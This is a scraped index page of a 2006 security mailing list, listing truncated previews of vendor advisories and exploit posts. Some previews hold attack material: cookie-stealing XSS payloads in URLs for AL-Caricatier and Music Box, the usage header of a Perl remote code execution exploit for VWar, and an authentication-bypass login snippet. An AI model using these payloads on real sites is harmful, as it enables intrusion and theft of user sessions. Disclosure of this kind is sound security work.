|
|
Colapse all |
Post message
[SECURITY] [DSA 1021-1] New netpbm-free packages fix arbitrary command execution 2006-03-28 Moritz Muehlenhoff (jmm debian org) [eVuln] Maian Support Authentication Bypass 2006-03-28 alex evuln com New eVuln Advisory: Maian Support Authentication Bypass http://evuln.com/vulns/103/summary.html --------------------Summary---------------- eVuln ID: EV0103 CVE: CVE-2006-1259 Software: Maian Support Sowtware's Web Site: http://www.maianscriptworld.co.uk/ Versions: 1.0 Critical Level: Moderate Type [ more ] [ reply ] XSS in AL-Caricatier 2006-03-28 xx_hack_xx_2004 hotmail com Hello Vulnerable: AL-Caricatier,V.2.5 http://www.php-ar.com Exploit : http://example.com/AL-Caricatier/view_caricatier.php?CatName='><script>a lert(document.cookie);</script> http://example.com/AL-Caricatier/view_caricatier.php?CaricatierID='><scr ipt>alert(document.cookie);</script> http://example [ more ] [ reply ] [eVuln] Maian Events SQL Injection Vulnerability 2006-03-28 alex evuln com New eVuln Advisory: Maian Events SQL Injection Vulnerability http://evuln.com/vulns/102/summary.html --------------------Summary---------------- eVuln ID: EV0102 CVE: CVE-2006-1341 Software: Maian Events Sowtware's Web Site: http://www.maianscriptworld.co.uk/ Versions: 1.0 Critical Level: Moderate [ more ] [ reply ] VWar <= 1.5.0 R11 Remote Code Execution Exploit 2006-03-28 uid0 exploitercode com #!/usr/bin/perl ## # VWar <= 1.5.0 R11 Remote Code Execution Exploit # Bug Found By [Oo] code by uid0/zod ## # (c) 2006 # ExploiterCode.com ## # usage: # perl vwar.pl <location of VWar> <cmd shell location> <cmd shell variable> # # perl vwar.pl http://site.com/vwar/ http://site.com/cmd.txt cmd # # [ more ] [ reply ] EEYE: Temporary workaround for IE createTextRange vulnerability 2006-03-28 Marc Maiffret (mmaiffret eeye com) eEye Digital Security has created a temporary work around for the current Internet Explorer zero day vulnerability within the IE createTextRange functionality. This workaround has been created because currently there is no solution from Microsoft other than the workaround to disable Active Scripti [ more ] [ reply ] SYM06-006, Veritas NetBackup: Multiple Overflow Vulnerabilities in NetBackup Daemons 2006-03-27 secure symantec com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 3Com/TippingPoint identified multiple buffer overflow vulnerabilities in daemons running on Veritas NetBackup Master, Media Servers and clients. See http://securityresponse.symantec.com/avcenter/security/Content/2006.03.3 7.h tml for full advisory cont [ more ] [ reply ] ZDI-06-006: Symantec VERITAS NetBackup Database Manager Buffer Overflow 2006-03-27 zdi-disclosures 3com com ZDI-06-006: Symantec VERITAS NetBackup Database Manager Buffer Overflow http://www.zerodayinitiative.com/advisories/ZDI-06-006.html March 27, 2006 -- CVE ID: CVE-2006-0990 -- Affected Vendor: Symantec VERITAS -- Affected Products: VERITAS NetBackup v6.0 -- TippingPoint(TM) IPS Customer Protectio [ more ] [ reply ] [SECURITY] [DSA 1020-1] New flex packages fix insecure code generation 2006-03-27 Moritz Muehlenhoff (jmm debian org) TSRT-06-01: Symantec VERITAS NetBackup vnetd Buffer Overflow Vulnerability 2006-03-27 zdi-disclosures 3com com TSRT-06-01: Symantec VERITAS NetBackup vnetd Buffer Overflow Vulnerability http://www.tippingpoint.com/security/advisories/TSRT-06-01.html March 27, 2006 -- CVE ID: CVE-2006-0991 -- Affected Vendor: Symantec VERITAS -- Affected Products: VERITAS NetBackup 6.0 Client VERITAS NetBackup 6.0 Server [ more ] [ reply ] PHPLiveHelper 1.8 remote command execution (include) Xploit (perl) 2006-03-27 stormhacker hotmail com [W]orld [D]efacers Team ====================================== --------------------Summary---------------- eVuln ID: WD00 Vendor: phplivehelper Vendor's Web Site: www.phplivehelper.com Software: Live Customer Support Solution Sowtware's Web Site: http://www.turnkeywebtools.com/index.php/location/pro [ more ] [ reply ] XSS & SQL Injection in Music Box v2.3 2006-03-24 xx_hack_xx_2004 hotmail com Hello Vulnerable: Music Box v2.3 http://www.MusicboxV2.com Exploit : XSS : http://example.com/music/index.php?id='><script>alert(document.cookie)</ script> http://example.com/music/index.php?action=top&show=5&type='><script>aler t(document.cookie)</script> http://example.com/music/index.php?action= [ more ] [ reply ] [DDSi-SA] XSS in Raindance Communications Web Conferencing Pro 2006-03-24 D.Snezhkov (dsnezhkov gmail com) Microsoft Windows XP SP2 Firewall issue 2006-03-24 edubp2002 hotmail com Windows XP firewall had improvements after SP2 and it display alerts about programs trying to listen on a port (acting as a 'server') to the users. It doesnt display the path for the file nor the last extension, instead, it only displays its description or name without the final extension. if u pl [ more ] [ reply ] Re: PasswordSafe 3.0 weak random number generator allows key recovery attack 2006-03-24 ronys users sf net Hi, - As has been pointed out, this is a BETA release, so it's a bit, er, inelegant to describe this as a flaw in 3.0. Guess I'll have to bump the release number when we fix this... - At least this is an implementation flaw, as opposed to the format design flaw that the good folks at ElcomSoft fou [ more ] [ reply ] Microsoft MSN Hotmail : Cross-Site Scripting Vulnerability 2006-03-23 Renaud Lifchitz (r lifchitz sysdream com) Blog Pixel Motion<=1.xx Authentication Bypass Vulnerability & SQL injection 2006-03-27 dabdoub_mosikar forislam com [+]Blog Pixel Motion [+]Sowtware's Web Site:www.pixelmotion.org [+]founded by Morocco Security Team [+]creetz to:SnIpEr_SA,Esp!onLeRaVaGe,CiM-TeaM,Kasparov,nabil,sniper,www.lezr.com and all muslim [morocco] [+]http://victim/blog/admin/index.php [+]user:moroccan-security //you can write any name :) [ more ] [ reply ] ZDI-06-005: Symantec VERITAS NetBackup Volume Manager Buffer Overflow 2006-03-27 zdi-disclosures 3com com ZDI-06-005: Symantec VERITAS NetBackup Volume Manager Buffer Overflow http://www.zerodayinitiative.com/advisories/ZDI-06-005.html March 27, 2006 -- CVE ID: CVE-2006-0989 -- Affected Vendor: Symantec VERITAS -- Affected Products: VERITAS NetBackup v6.0 -- TippingPoint(TM) IPS Customer Protection: [ more ] [ reply ] [ GLSA 200603-25 ] OpenOffice.org: Heap overflow in included libcurl 2006-03-27 Stefan Cornelius (dercorny gentoo org) |
|
Privacy Statement |
Genius VideoCAM NB Driver
http://download.geniusnet.com.tw/CAMERA/webnb.zip
Other genius webcams with the same 'snapshot feature' might be
affected with the same issue, if you have any of those please try to
reproduce this issue.
Affects: Windows XP / Windows 2000
Proof of c
[ more ] [ reply ]